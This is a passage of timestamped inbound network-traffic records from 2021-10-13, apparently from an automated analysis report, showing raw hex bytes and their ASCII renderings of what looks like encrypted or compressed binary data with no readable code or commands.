77 85 d2 f9 de 29 Data Ascii: 2\v/sy Z\|=u\V)Xu'( Cl2*jG,pAa{LU)dffD/a1sI+j&XSC\|M>Ed}0MW=K~ZeA;c@k`?"t~I4[<k'RO>![MNKm$k;y l]pDO"_guw)
2021-10-13 13:51:48 UTC	206	IN	Data Raw: ec 73 c4 9e 69 6a ab 95 bb 07 e2 b6 62 e4 75 a4 19 0b 4c b1 7c c9 88 ea 6f cf 52 34 0c fe b1 19 fa c0 77 05 15 8a a0 40 b4 a6 74 54 d7 9c 65 cd 66 a8 cf 78 c6 9f 92 29 bd bb 10 2b 7d 26 23 c4 e9 c7 e3 58 e1 c8 d2 5b 12 f1 12 51 f6 ca 07 fc c0 4f b9 43 1c 9c 7e 8d 78 79 02 22 dd d8 f1 8f 45 f0 20 4c 1a 90 f7 64 0c f4 b3 27 99 51 21 67 d5 b8 b9 17 39 a5 a3 1c ec 8e f7 8d 9b 40 5f 42 18 4e b5 d8 22 f3 e1 77 fd f2 aa b6 cc 4d ef d7 57 41 9d 04 7b 64 c8 86 45 49 01 56 79 15 fc 2f 75 2d 6c 29 87 61 9b 57 26 21 b6 d7 a8 93 fe fe ec 8d 5d 61 05 3f 19 e8 08 af 7b 2d c1 4a be e5 88 ce bf fa 67 03 f1 e9 ad 69 13 17 d7 84 3f ee f2 cc 12 db a0 0d c5 dc 9e f9 48 8c e6 38 e7 87 9e 36 9c f6 4f ea d3 60 bb fd ce 45 b0 22 7b a2 61 5f b6 81 b4 68 5c b5 72 8b 1f 13 16 71 4f Data Ascii: sijbuL\|oR4w@tTefx)+}&#X[QOC~xy"E Ld'Q!g9@_BN"wMWA{dEIVy/u-l)aW&!]a?{-Jgi?H86O`E"{a_h\rqO
2021-10-13 13:51:48 UTC	207	IN	Data Raw: 9f 2a 2c 62 76 5f b8 a9 fa b9 e2 fb 79 4c a8 fe 97 01 e3 c5 0e 2c 99 9f cc 90 fc c7 12 27 82 55 2e 60 d1 9d ad e1 aa b3 f7 52 bf ce 8a 08 60 77 26 95 07 3e 14 ea c6 b8 2c 57 ba 11 bf 25 07 73 25 6e 2e c1 91 a1 82 91 5f 60 ba 68 8a 96 26 28 03 38 7a 5e 33 d2 1f 97 6e fa bd 0d 1e 19 d6 dd 97 7b 78 64 e3 6a e1 82 67 17 46 a8 c6 3e 8b f3 cb 55 e0 43 7b 31 04 1e 43 00 0e 2a d7 4b f9 15 9e 28 ae 23 6f 62 85 47 5e 62 3a 84 1f e8 a3 e4 8c 5e 4f 71 a0 5b 10 9f b8 8f 57 1c 8e 3f dc aa 0f d1 aa 38 59 d2 47 2c 15 2e 2a be 86 f3 06 51 84 4c 63 b0 56 17 92 c1 8b 8c 26 da be 22 0f 84 11 1a b4 7f c8 1d d1 2e 47 9d 88 3c f6 b7 11 dd 84 d5 3d 93 31 27 22 00 18 e2 85 d2 09 1c 9c 2e 06 0a 7f c9 16 bd 0e 26 77 ed 01 18 3b f8 4a 20 fb 91 f8 4a 72 b1 a6 03 7e ed cb 39 06 7a fc Data Ascii: ,bv_yL,'U.`R`w&>,W%s%n._`h&(8z^3n{xdjgF>UC{1CK(#obG^b:^Oq[W?8YG,.*QLcV&".G<=1'".&w;J Jr~9z
2021-10-13 13:51:48 UTC	208	IN	Data Raw: 39 d8 c8 47 fb 42 bd 02 1f 78 74 50 63 fb 81 85 6b 20 65 c9 66 74 1a c2 d3 e4 1a 3f 1e 1a 57 99 ef d4 ae 34 15 06 df 56 dc a3 94 29 eb e1 69 a8 13 28 3f a2 c5 f4 1e 99 d6 b8 0c a9 e3 0c a7 7e 29 79 fe 3f 01 0e a1 5c bd b9 d1 09 21 dd d2 66 98 00 50 29 62 0a a6 bf 32 28 31 02 25 21 3d 0b eb 3e 70 4a c8 84 47 44 51 fd a6 1c e9 f2 4b 0a d8 3b eb 5a 9b 08 55 c3 60 45 fe 27 3e c3 a0 67 02 01 19 5b f4 ce 69 3c b7 b0 ea 3a 35 20 8e 66 3d 02 ab e6 8f d4 28 2c 09 2a f3 ce a5 16 b6 30 91 07 ab 22 c0 f9 ed 0c 19 f7 85 74 f8 8c 38 93 4e 9d 3f 1e c8 85 ed 3e f1 6e 5d ca 5a a1 64 c4 63 2a 2f 12 65 17 0b 3c 6c 32 11 f6 dc 6f cd a0 bc f6 71 27 1c ac f3 25 b4 37 40 3d 35 91 f8 3c 44 1e 47 01 cc 7c 0b bc ab cc 72 66 86 9e 77 a8 16 43 4c 8f d6 0a 7e 76 0a 69 7d 88 c4 87 74 Data Ascii: 9GBxtPck eft?W4V)i(?~)y?\!fP)b2(1%!=>pJGDQK;ZU`E'>g[i<:5 f=(,0"t8N?>n]Zdc/e<l2oq'%7@=5<DG\|rfwCL~vi}t
2021-10-13 13:51:48 UTC	209	IN	Data Raw: 97 58 f3 e1 ff f9 de cf 33 27 dc 43 b5 df 8f 8c 19 c1 27 94 dc 27 38 a8 da 7b 82 f2 dc 76 3f 8c 41 8f 8c 0c ce e2 a4 97 c8 81 ec bd 7e 66 c0 f3 91 bc 4f c7 b9 a0 70 41 8e 91 1d b3 71 7d 2e 85 3f a5 a3 8e b6 45 82 9a bf 35 7a d9 44 6a 5d 11 af ed 2d 01 dd 9e 98 85 27 0e ff 18 2b 38 a1 18 cc e8 6f d9 05 5c 25 2f f3 05 fb cd 91 b0 48 c3 31 56 63 13 35 65 a7 bd df 1e 18 c7 50 32 25 85 e6 a9 51 66 4d 19 e9 fb 33 5e 1c a9 75 11 dd 0e 98 7e af f7 9e a1 e3 21 d8 77 15 a0 d0 d0 f5 8f 14 b1 4b 11 88 18 2a ed a7 30 1f fc b0 3d 00 88 ac bc b3 1e c0 fa f4 54 79 85 f6 19 31 79 7f ef d6 89 42 2f 6a 74 30 cd bf 76 94 35 69 de 9e 94 eb 6d 3e ee 68 bb 1f 43 be e0 bc d2 7b 42 77 5e c4 0d 0e cb 82 71 df f7 ec a7 69 13 49 28 25 08 2d 56 43 a4 db 8a ba ab 07 45 ab 7b 4c ef d9 Data Ascii: X3'C''8{v?A~fOpAq}.?E5zDj]-'+8o\%/H1Vc5eP2%QfM3^u~!wK*0=Ty1yB/jt0v5im>hC{Bw^qiI(%-VCE{L
2021-10-13 13:51:48 UTC	210	IN	Data Raw: 29 dd 4d 43 54 42 16 7f 9f da b1 a7 ca ed 76 4a 4c 53 4f a2 b4 d4 b6 56 f1 84 2b ce 91 22 f0 f9 92 23 d1 3d 53 98 77 9c 1f 61 7a ce 4d 87 a3 4b c4 a5 5c 73 f4 4c 4f 40 59 97 27 9a 2b e5 e3 a6 1c b5 9c 67 e7 19 af 14 93 c7 96 94 23 ab f0 08 bb a5 5e 33 d3 c8 29 3a 80 ce e2 27 53 9a b6 3b ea 02 ae 58 a5 15 51 b7 92 32 1b 1b 30 ae c6 96 ac 7d c3 a9 19 41 f0 4b 7f d8 83 c7 1c e4 66 7e 31 6b 17 ac 68 c5 9e a0 83 6c 3a bb 6d 9e 36 39 5d 58 18 ad 2f cc df b1 64 29 8c ad 1e a5 ed 2a bf 98 83 02 c0 77 79 a1 44 bc 6a e1 b3 54 4e b4 07 31 3b ac 40 7c 24 15 76 c6 4a 2d 22 32 18 7f b0 09 99 8b 7c 00 78 07 cf a9 bd 6a ec 3c e4 1a c7 0d 9f 18 e9 06 80 86 45 90 31 99 b0 f4 b9 f3 aa 6c c3 f0 65 11 69 cc 1c 4b 86 63 72 8e 50 6c 53 d4 7b 4e ee a2 7b 05 9d 07 97 03 0d d9 8b Data Ascii: )MCTBvJLSOV+"#=SwazMK\sLO@Y'+g#^3):'S;XQ20}AKf~1khl:m69]X/d)*wyDjTN1;@\|$vJ-"2\|xj<E1leiKcrPlS{N{
2021-10-13 13:51:48 UTC	211	IN	Data Raw: 19 63 51 80 04 ab c4 07 f4 9f f4 14 57 b8 4a 27 01 0e fa 0c 36 ad 8e f2 7f e6 df 3a 75 cc 55 da 6c 41 36 69 2b 9f 31 83 03 ca ad 6d 61 6d 0e 21 f1 0a 79 6c 34 97 23 e3 6b a1 c7 71 d7 b0 e9 b9 b9 af e3 2e 26 67 b4 1e 18 66 66 18 4d 4d 2b cc 19 15 5c 20 13 2f 89 bd ff 16 dc 16 f9 2c a0 f1 14 20 a3 77 01 75 61 ca 9d 17 f7 53 bb 3f 6e ac 5e 5f 6c ac 45 86 ea 30 5a 57 2f 59 40 2e 02 02 36 45 c5 5d 2e a5 e5 42 eb 19 ee 84 5b 13 2b d9 76 92 53 b5 56 24 e2 3b bd b4 99 f6 80 61 43 e0 05 c4 0f 18 06 2e 76 37 a4 38 ff 31 e0 68 64 b0 9d 51 40 92 ba 0e 7c fb c7 04 1e 9b eb 83 13 2b d9 c3 ca 0d 02 75 94 93 e4 1c 1e 7b ee cf d5 7c 8e 95 5c 95 3f b8 93 9e 88 70 e4 6c 18 42 8e 15 32 0f d8 7a 08 b9 9c d5 16 7a 75 2c 47 12 73 f5 4e ec 9f 3f 55 53 6a 80 fb 6f 3a c0 a3 7f 7f Data Ascii: cQWJ'6:uUlA6i+1mam!yl4#kq.&gffMM+\ /, wuaS?n^_lE0ZW/Y@.6E].B[+vSV$;aC.v781hdQ@\|+u{\|\?plB2zzu,GsN?USjo:
2021-10-13 13:51:48 UTC	213	IN	Data Raw: f8 85 80 10 a1 20 4a d6 c6 7b f3 44 fa fe 77 f3 67 90 c3 c2 03 92 4c b0 eb 8e 7a b2 78 e0 d4 2d a0 bd 34 85 36 84 46 ca 7d 6b 4c 23 ea ff 3e 9e 0c e8 31 34 c5 56 bc 21 1b 7d 42 00 04 9d d3 7c 7f 63 5a 87 da 5d 7d 21 83 5c 9c 9a 28 53 95 e1 a6 b7 1d 70 c3 ec 82 d3 47 cc b5 96 42 f2 78 60 44 99 2e 6e 5c 0f 7d 50 7e 43 47 76 32 5c c0 39 9b de 7f 18 ae 24 77 45 c6 6d 1e 57 82 5e e5 b4 6c e3 ee c4 ec e9 ff 3f a5 cf 34 bf ae c2 ce ef 90 a7 6a 35 b9 be de c3 88 1d 77 63 78 24 3c 5a f5 ad 0a ea db a3 99 05 91 17 19 28 d5 85 52 51 41 f8 b8 f6 86 39 0e 67 fd bd d3 f3 93 cd 92 6c ef 1b 8f d0 f6 08 cc 60 9f 9a 9d e6 c9 44 c5 d0 10 73 0d e0 5c 67 a3 7b 51 0d 86 19 21 dc c5 1f a2 cd ee 04 9c e4 ed 46 04 65 a4 3c 97 b6 80 3a a9 b6 c3 a6 4c 06 30 e4 12 63 e1 4b 9e 24 28 Data Ascii: J{DwgLzx-46F}kL#>14V!}B\|cZ]}!\(SpGBx`D.n\}P~CGv2\9$wEmW^l?4j5wcx$<Z(RQA9gl`Ds\g{Q!Fe<:L0cK$(
2021-10-13 13:51:48 UTC	214	IN	Data Raw: 16 60 c0 8d 50 17 73 a9 87 c2 7f 4c d3 96 69 e6 37 c3 3c f7 17 48 7a f4 b3 12 e7 c2 c6 ee c7 a6 db be 5e 99 4b 3c 92 73 7a 35 4b 5f 17 9f ed 76 40 cd 57 24 5d 51 d2 b6 d5 35 d8 a9 a2 14 b4 6d 2d 9d 10 11 e0 ca 53 72 23 64 43 fe 5d 32 78 dc b4 9b 76 9a 9a f8 d9 74 e4 54 23 40 06 47 ca 74 e7 c8 9e 1b 8b ef 1b af 27 00 cf 9c 64 68 c5 7d 47 b7 2c 48 b2 01 bb 9a c1 c7 9e 84 ae d6 3c 16 07 cf db 0b b3 7f 2f d7 76 cf d3 e7 15 49 42 6d e2 26 23 a6 93 f6 4c f2 4b f2 30 68 88 f0 bf 31 a0 bc 54 af a3 ee 94 de 60 12 4f 47 4a 65 05 c9 01 f0 1a 6b ad 72 4f 7d 1c b4 15 11 6b a4 fa e9 20 39 90 b2 cb 07 22 bd 77 60 bd e3 2c 73 db 23 70 8e 67 33 2a 89 5d ac 5b 66 1e f2 e9 8f 65 0c 79 b4 41 12 8f 37 dc c0 83 67 fe a1 60 66 0c 5c b5 70 c8 5f 1f 7d 10 a4 5b 89 00 70 a1 6f 7b Data Ascii: `PsLi7<Hz^K<sz5K_v@W$]Q5m-Sr#dC]2xvtT#@Gt'dh}G,H</vIBm&#LK0h1T`OGJekrO}k 9"w`,s#pg3*][feyA7g`f\p_}[po{
2021-10-13 13:51:48 UTC	215	IN	Data Raw: f6 36 28 9f 5c bb 27 c1 b6 28 ae 5c b3 cc 52 48 39 04 3a ce 67 25 b5 4d 69 05 a3 10 d5 5c 42 46 c4 9c 71 b8 36 2f 1e f7 d1 c2 0f 8a 07 b4 ba 3e 21 d1 25 49 cc 2b b1 07 b7 6b f6 db f2 87 b2 52 27 4f ed 66 52 5e f1 f3 21 a2 06 85 fe f7 89 53 69 0f 47 e4 91 78 68 dc 1c b4 b9 d6 60 78 7c 72 bf c5 eb 0f 7b 26 dc 22 f5 5c 96 a0 dc 13 c6 62 7d ef 5b 5c 30 44 00 1a 57 b3 16 1a d2 97 20 36 79 3a 79 2f 1f fc 09 5a 59 55 8a 98 23 38 3f c0 39 d1 65 1b 4d b9 00 00 dc e3 da a9 32 86 26 52 ba 5c 6a 4f 18 bd ec 6b d3 28 16 6b 0d 68 da 79 51 c3 74 ae 4a f9 21 4f 30 cf c7 f3 9d 5f 07 9e 5a 05 c4 05 52 2e 7d 9e 8b 0a b7 e3 b1 24 78 68 fe b6 d7 f3 92 33 80 d9 7d 23 f9 09 95 b1 e8 1b 72 7e 2a 62 4f 63 6d f1 91 e4 9f e1 b2 b1 ab 15 a4 70 6a 54 04 af b0 d5 71 0f fc e4 3c 91 41 Data Ascii: 6(\'(\RH9:g%Mi\BFq6/>!%I+kR'OfR^!SiGxh`x\|r{&"\b}[\0DW 6y:y/ZYU#8?9eM2&R\jOk(khyQtJ!O0_ZR.}$xh3}#r~*bOcmpjTq<A
2021-10-13 13:51:48 UTC	216	IN	Data Raw: 3f 8e 5b 93 16 db 9e a7 a2 f0 31 a0 09 71 7b f1 fa b6 1d b8 51 c2 ce 7a 1e c0 fc f0 2c 6b c1 48 01 3c 91 fa aa a3 f8 42 51 d4 28 bd 48 5b fc 03 49 87 2a da 50 eb 6d c7 3c 0f fb c0 b1 ef 08 41 7c d2 3e a3 63 44 98 6f 34 09 c3 0e c4 ad 4d 39 fb 62 44 60 62 a0 e4 23 70 96 ab 66 4a 98 0f 4e c7 5d b8 b3 8f 9f 95 2d 87 c9 37 a3 33 f4 36 fc 0c 59 48 cf e6 f4 0d 89 4a 77 5c 5a 82 63 fd 06 e2 4c 0d 5f 18 72 f1 fd 97 87 bc b8 fd 29 61 de 24 11 88 fd a0 37 e5 72 45 c1 6c 1e ee 92 5e e5 bc fd 43 3c c5 be bf 76 24 66 7c a5 5d f2 01 89 ff ab 1b bd 31 7d b0 df c3 50 1e ec 7c 42 24 f4 76 59 04 c7 60 61 b2 2a 12 f2 6d 22 df d3 81 6b dc c7 48 26 90 23 e4 f6 fa cc c4 bc f5 3d bf 97 d6 55 e0 53 c8 f6 74 8b ac 12 16 03 fe c9 80 55 a4 6a 64 a2 92 f6 e3 f5 92 ed fb 29 0e 0d 0f Data Ascii: ?[1q{Qz,kH<BQ(H[IPm<A\|>cDo4M9bD`b#pfJN]-736YHJw\ZcL_r)a$7rEl^C<v$f\|]1}P\|B$vY`am"kH&#=UStUjd)
2021-10-13 13:51:48 UTC	218	IN	Data Raw: 8e 95 5a 45 6b cb ea 81 4d 35 18 2c 91 cc 96 9d 7a ef 62 bc 3c 31 c4 31 ac ac 71 1c 4f 21 a2 7f e1 bf 77 b4 a4 31 71 49 c8 b0 60 4c 62 ef 9c f5 ca 39 5b 2f 41 37 47 0c 43 1e 64 4f 9a 13 c6 09 67 fe ca 8d b9 70 04 ee ad bc fb cc 84 70 1b 2f 89 8e f5 d6 ff fb 0c 85 aa a0 81 27 bc 43 52 e6 0e 1f c5 9b 47 6f 85 2d e2 d5 3b bb 78 ac d1 40 66 b7 c4 28 11 7f 2e e5 96 e7 46 7a 1d 69 ea a5 22 39 ba 51 62 6c 10 92 d2 db 50 47 c8 cb 15 19 85 ba 48 a7 6d cb 01 f5 54 a7 41 4d b8 ac 0e 3c 2a 30 32 ba f7 65 f5 fc ab d1 e4 68 7e ed 24 7b 56 18 50 3c 0c f0 b9 4e 39 40 ae 05 09 7e f3 4d 65 99 8c 14 ac a3 ee 4e b8 54 c9 bd d8 56 14 79 6c 75 e8 61 be af fb 81 4d b3 7c 2d ef e5 d8 74 ce 67 73 cd 4c e8 de 7a 96 28 19 40 6a fa 4f 1e dc f5 8d b7 30 b1 b3 cc 53 a4 99 c6 5f dd 26 Data Ascii: ZEkM5,zb<11qO!w1qI`Lb9[/A7GCdOgpp/'CRGo-;x@f(.Fzi"9QblPGHmTAM<*02eh~${VP<N9@~MeNTVyluaM\|-tgsLz(@jO0S_&
2021-10-13 13:51:48 UTC	219	IN	Data Raw: a1 97 53 db 5f 91 fe 25 ab e2 f1 a8 f6 17 7b d4 7a 4a 3d f0 6e ad 44 dc c9 cf a2 65 c9 d7 61 4d 18 62 08 18 5d 4d 33 71 11 e7 b2 40 49 e5 44 14 95 6a 3f 67 c5 b7 5e 58 b9 90 33 02 c8 9a bd 40 db 47 2c 5d 35 a6 79 78 96 cf 09 b5 ac 41 04 0f 6b aa 6e 25 2d 66 43 5f 01 a3 6a a6 dd 02 6d c4 d8 d0 11 69 75 b7 13 70 2c 12 2f fd 56 f9 9c 80 02 0a 90 5c 68 04 77 7f 7c bd bb f7 41 f7 ab db ee 62 ee f8 b4 c6 00 9b 23 32 92 13 e9 57 3c ce 64 d0 17 2e 9b 03 40 fc 99 d9 f9 fe 4f c6 f0 a9 90 6b 8d f5 6b dc af 7b e3 96 e4 67 96 43 c1 35 c4 d8 3b 8c 94 67 58 03 f8 bb 1f d2 fa e7 c9 5b 0e 05 32 37 b0 2b f7 ef 3e 96 a9 5b ad 93 af 9f bd 99 10 d7 1b 72 43 bb 6c 72 ee f8 5e b3 c5 a2 15 ac 55 03 c3 46 77 7f 25 63 ea f3 37 67 b6 3f b5 f9 fc 8a 19 c8 52 e2 93 bd 1b 67 92 0f 87 Data Ascii: S_%{zJ=nDeaMb]M3q@IDj?g^X3@G,]5yxAkn%-fC_jmiup,/V\hw\|Ab#2W<d.@Okk{gC5;gX[27+>[rClr^UFw%c7g?Rg
2021-10-13 13:51:48 UTC	220	IN	Data Raw: 30 66 63 31 f7 04 b2 25 5d 20 ce e5 2b d5 45 03 42 a1 43 9a 49 61 8b d7 b8 b9 f0 17 a2 a3 96 eb 4f fb 71 a4 ef 12 3d f6 73 aa 23 7b 71 81 e4 fd 70 55 38 36 15 0c 9c f9 bc 11 76 36 37 aa 87 13 48 fe c3 86 bf 0f a4 f2 45 9c d6 87 cf 32 f9 8a ba 49 5c 87 9f 63 34 ee ad b2 c0 c2 60 88 b8 e0 e2 2d c8 9c 0a dc 03 fa 5b 40 1a 6a d7 3c e4 9e a9 96 bf 28 2f e9 60 a1 19 35 13 7e 7c 0b f4 4c 2c ab cc 5a b2 f4 00 47 af 8a 66 78 49 e8 db 35 7b 9d a3 67 39 33 4a e4 54 b8 03 ae e6 11 ec 8f 65 a8 2c b8 00 84 48 04 02 11 f6 ae 32 2d ff 0e ab cf 2b c4 c7 98 cf e1 f2 d7 be b3 e2 06 c5 64 23 4d 8c 0d d9 07 72 73 23 f1 d5 71 a5 cd a3 f1 8c 2f d6 83 23 56 6c bb 55 c7 12 74 4c 7d 46 95 9e ee 01 6e c8 cf 8d c8 ef 98 09 28 e2 c6 7b 00 25 14 eb f7 f3 28 bd eb 2e fc 9c b9 af 02 6e Data Ascii: 0fc1%] +EBCIaOq=s#{qpU86v67HE2I\c4`-[@j<(/`5~\|L,ZGfxI5{g93JTe,H2-+d#Mrs#q/#VlUtL}Fn({%(.n
2021-10-13 13:51:48 UTC	222	IN	Data Raw: 3d 79 34 c9 94 6c de 0f 73 22 59 35 17 bc 14 07 4d 9b ac 85 5c 87 70 a4 81 61 dc 50 be 6a a6 dd 40 19 6e d6 c0 bf 65 98 3b 72 20 0c 3c 82 cd 96 9d 77 1f d2 30 24 3f 5c a1 ad 9c 69 3f 47 12 aa f6 27 1f ce d7 3b cf 43 83 70 22 b9 00 e6 dc 47 20 ab 4a 53 59 72 3e 5f d1 e9 3e 57 24 5b 13 c2 05 d1 e4 4e 44 9c c8 95 99 99 22 0b 96 f2 af a0 ed fb 96 f1 0d cd e3 d5 3d 85 37 35 ac 91 01 97 26 95 d4 0d 1f 88 a2 85 9a 79 b9 3b 80 ff 28 60 d2 a8 a7 4f 6d 1d fc 49 0a 4b 9c c4 b8 68 cb a6 2b d7 e3 ab fa 88 66 e7 92 fa 37 05 cb 46 12 50 fd 93 3f a5 2d 18 b4 c9 49 ea 73 c0 9e 6f 72 a3 96 81 f8 60 db 05 70 7e 2f 6f ca 44 7d df 1d 1c b5 09 dc 87 fa 31 f0 94 30 31 4a e9 22 1d b4 17 ea ed c1 b0 40 4a 5e 11 c5 de 60 2c 2f cc cf 6d ab bb 73 f2 5d 8a 52 23 aa 30 bd d9 28 9b db Data Ascii: =y4ls"Y5M\paPj@ne;r <w0$?\i?G';Cp"G JSYr>_>W$[ND"=75&y;(`OmIKh+f7FP?-Isor`p~/oD}101J"@J^`,/ms]R#0(
2021-10-13 13:51:48 UTC	223	IN	Data Raw: 5f 0d ed 52 8a 2e 70 93 9b 95 c7 bc 5c 3a bf 4f b6 fb f7 95 7e 5e 63 d5 94 e5 be 62 78 d0 37 aa d6 6c 48 68 e9 c9 ff e1 af c2 8f 75 6c 26 2d 58 64 9d 3d 2d 21 a1 6e e2 46 f5 bc 60 94 80 6e 21 2d c5 34 06 ae 90 9c bf 77 c4 7d 88 ea a2 4c 9a 00 24 40 70 3c 4d 6c 81 f5 c1 95 33 02 c8 9a bd 4f 6d be 8f 9e ae f2 89 53 37 7b b6 b2 e3 6d a9 b9 3e ac d7 eb f1 fc 11 b4 f3 5f 42 4c a9 80 37 c2 28 54 e2 20 42 64 5a 39 8f 8d b5 61 9a c9 15 05 06 7a 28 a7 36 f3 63 6a ae a6 7e 64 1e 01 a4 b3 44 16 54 ff 0b 50 de 70 dd b9 44 76 66 18 71 f5 5a bd c0 61 06 fa 01 cb d2 1a 72 ea a0 2d 7a 7f 50 47 5b ee 26 94 03 85 29 47 88 ef 6b d9 c6 c0 12 97 d3 8a b8 52 c5 db e4 0b 3c db a7 be f5 38 50 ba be 4a 4f 18 bd ec 7f d3 28 6d 04 b1 e3 dc f2 91 46 f6 da b1 37 34 a6 fe a7 8f 62 84 Data Ascii: _R.p\:O~^cbx7lHhul&-Xd=-!nF`n!-4w}L$@p<Ml3OmS7{m>_BL7(T BdZ9az(6cj~dDTPpDvfqZar-zPG[&)GkR<8PJO(mF74b
2021-10-13 13:51:48 UTC	224	IN	Data Raw: c9 01 9b 64 31 28 b2 c3 3d 71 33 d5 64 a9 ba 3c 17 5e 05 c2 e6 23 a1 fd 55 a3 c7 78 eb 2a 77 d0 9a c1 8c 67 33 cd 42 5d ac 5b df 4f 1a 29 ab 4f 42 f0 6d d4 88 27 9b 74 7a 44 87 a9 28 66 3a e6 90 b5 13 27 d7 10 d2 54 30 bb cf e7 7e 25 0d f0 bb f3 21 be 90 f4 fc d5 23 33 b6 3a 80 cb 70 52 ee 53 f2 3c 79 fc 2b aa 7d 01 9e 52 9e 31 cd bf 8f 69 f6 2a 3d 6c c6 66 e8 d2 4b 14 fa 6f c3 33 80 41 59 d2 90 9f 92 6c df f1 34 75 f8 4c c0 6d f5 94 ec b6 67 a2 6d a9 13 92 21 1b ae 6e de 76 5d a6 f0 d9 e0 4e fd 25 d6 f0 6a 7b 28 36 79 f5 8c d8 58 d9 c3 c9 76 3d cb 2b 0a 53 0e d4 e5 e1 0f 87 cc 21 2f c4 3d d7 92 75 a9 5b 40 47 02 2f 61 e7 c9 a0 8c 43 91 70 08 fb 48 67 d3 99 24 85 5f 66 fb 0d d6 44 b1 a8 34 f3 22 c4 d8 d1 e8 f9 2a 9e 52 20 f7 bf 19 31 ed 84 48 e6 15 a4 82 Data Ascii: d1(=q3d<^#Uxwg3B][O)OBm'tzD(f:'T0~%!#3:pRS<y+}R1i=lfKo3AYl4uLmgm!nv]N%j{(6yXv=+S!/=u[@G/aCpHg$_fD4"*R 1H
2021-10-13 13:51:48 UTC	225	IN	Data Raw: 2f 8b 91 d5 bb b5 06 73 25 d0 2f 61 99 f6 82 a2 4f 68 50 d4 0d d3 ca 47 76 66 7f e6 b5 65 08 1d 36 3e b9 d1 84 a2 00 49 d1 38 c8 9d 37 35 bf 09 d2 93 f5 1d cd fb 48 4b 1d 1a 08 9d c9 86 e2 43 80 d0 27 e1 a2 c8 8c ee 42 47 14 a0 e3 3c 91 b9 9f 40 da ae 71 f4 28 39 58 d1 14 89 79 78 11 fa fe a1 95 10 1c fb d4 58 82 8c 7e eb b3 8d b3 af d2 a5 b9 3f 85 2f 78 6f b7 d5 5d d6 4f 10 93 90 85 dd 58 a7 3c c1 5c 36 5a 7a fc 70 cd e0 e1 4f be ca 76 c3 8a 9b af 8b 4d d7 b6 d5 b8 21 6a 34 eb 1d d6 00 25 bf e5 63 0e d0 e5 d1 23 ab a1 54 68 57 72 c2 91 c0 79 47 a1 1a 1d 9a e4 a4 6c cd a2 3b cb 75 c6 b6 66 98 18 1e af 26 53 5e 8e 87 b0 ad 7b 45 3e 71 cc b6 d1 9d ee 63 e0 46 bf c7 da 99 0f 10 f0 e1 a2 91 fd eb 7c 86 07 b6 7f 98 de ba 90 94 84 89 c9 25 6d 62 76 f4 7f 8e 44 Data Ascii: /s%/aOhPGvfe6>I875HKC'BG<@q(9XyxX~?/xo]OX<\6ZzpOvM!j4%c#ThWryGl;uf&S^{E>qcF\|%mbvD
2021-10-13 13:51:48 UTC	226	IN	Data Raw: 12 2a c2 7a 3f 5f 8f d2 ab 64 49 14 52 5d be 27 84 b8 d6 98 9e ca d8 32 52 bb a5 04 fd 0f 49 c5 51 77 a7 c9 ee 8d 1a e5 18 c5 f4 bf c4 f3 55 e8 19 b8 5c 1d d2 fa 62 a6 99 53 b5 06 06 2f 80 a4 b4 99 f6 57 64 be be c6 93 b5 56 4e 2b 74 37 2d e6 6e bf 9a 94 12 c1 e8 34 c9 17 4b 7c ab 07 2f 10 04 6a e1 e8 6d 95 85 c2 f0 e6 74 99 48 c3 0c 18 d7 ba e1 29 fe 0e f4 68 28 3f 40 5f 15 2e 62 84 15 3c 91 75 ca 16 32 0f 62 34 a3 6b f6 ab f9 7d e4 af b9 ed 05 2b e7 a2 1d 6e ba 54 d7 83 04 90 4e eb 3a 69 95 45 23 43 03 33 18 6a dd 80 86 6b d7 45 c4 78 29 f6 ab db c2 19 1d ce d1 6a 80 80 37 4d 3a ea 4a bc 20 2b e2 b2 58 1c 08 80 36 87 dd be 56 c8 14 69 f8 5d ce d0 41 ee 8b 23 0e a3 99 14 a1 31 3a 73 23 4b 47 ec 0d fa 65 6e 16 48 09 ad 3e 9b 2b 38 ac 57 1e b1 f0 67 8d 1a Data Ascii: *z?_dIR]'2RIQwU\bS/WdVN+t7-n4K\|/jmtH)h(?@_.b<u2b4k}+nTN:iE#C3jkEx)j7M:J +X6Vi]A#1:s#KGenH>+8Wg
2021-10-13 13:51:48 UTC	227	IN	Data Raw: 0a 6a e3 97 d9 87 9f 27 3f d0 3f b4 44 17 2c 83 37 f5 05 f4 b9 a6 3a 31 8e 44 4a c5 24 9e 15 97 b0 b3 f2 d5 09 0d 39 ea 53 84 47 7a 9b ce 7b 39 27 2e e6 24 27 18 69 c0 64 f6 fb 07 6f 21 5b fa 1d ec e5 cb 45 91 9e 09 52 a3 88 49 9c 31 ee 0d ee b6 5a db a3 e5 25 66 42 cb fc fb c7 80 88 8f d0 b8 e6 6c 32 49 4f 17 5e 82 4d e6 8b 08 6b da 11 65 68 a4 32 aa d6 b9 de b4 0f e5 8b f1 fb ed f9 79 e6 2f 9d 2d 61 9d 3d 3b 28 2c fb 43 23 1c 72 f4 6a f4 dc 63 af 56 5f 07 c4 13 32 bb aa 0c 00 54 9d 18 bb 41 07 2c 6b 24 cd c6 b4 09 e1 1f 39 0b b8 a3 46 b9 1f 85 db 34 72 ae 7f 04 df 0c c1 bd a3 0b eb a8 7f 7b d9 82 73 7a 0c 84 f2 f9 b7 6b a6 56 97 36 81 ad d8 2d 16 3e f0 9f f1 d7 d3 c4 38 33 bd 2b 03 b6 bf b9 f5 13 22 17 1e 8d b6 6d d8 12 60 20 4d bb e9 31 6e 8b d0 27 8f Data Ascii: j'??D,7:1DJ$9SGz{9'.$'ido![ERI1Z%fBl2IO^Mkeh2y/-a=;(,C#rjcV_2TA,k$9F4r{szkV6->83+"m` M1n'
2021-10-13 13:51:48 UTC	229	IN	Data Raw: 75 bc be 60 20 3d 28 37 ac 72 9a 67 8f 06 ad 25 53 14 46 57 54 52 84 14 3a 79 10 6d da a9 61 c5 c7 30 61 e3 43 41 2b f7 b4 99 a2 91 7e a4 19 0b 97 ef 1f 79 11 ba 90 9e 1d 79 9a 7a fc e0 f2 b7 80 71 2e 8e a1 57 08 c7 31 ac d1 98 15 48 79 e5 44 d5 31 30 3f ad de a3 fd 5f 8a c5 6d ce bb 38 bc 50 64 d8 d0 5b bd 2c b7 98 e1 9d ef c6 af 5c bb 37 b6 a7 e5 89 f6 6d 43 67 33 a6 ca 58 c7 5a eb c8 1a d5 54 9b 66 fe b0 a9 3a 37 64 8b ab 83 42 72 2d a6 a2 e0 90 b5 aa d8 b3 09 37 28 0b db 55 25 73 a1 84 67 bb 0f 55 c4 1a 85 46 22 f8 e8 f6 b3 85 cb df 88 4b 44 50 56 79 f2 ba aa aa 97 79 c5 83 cf 32 34 47 f4 e6 81 2a da 59 eb 6d c9 75 d3 5b 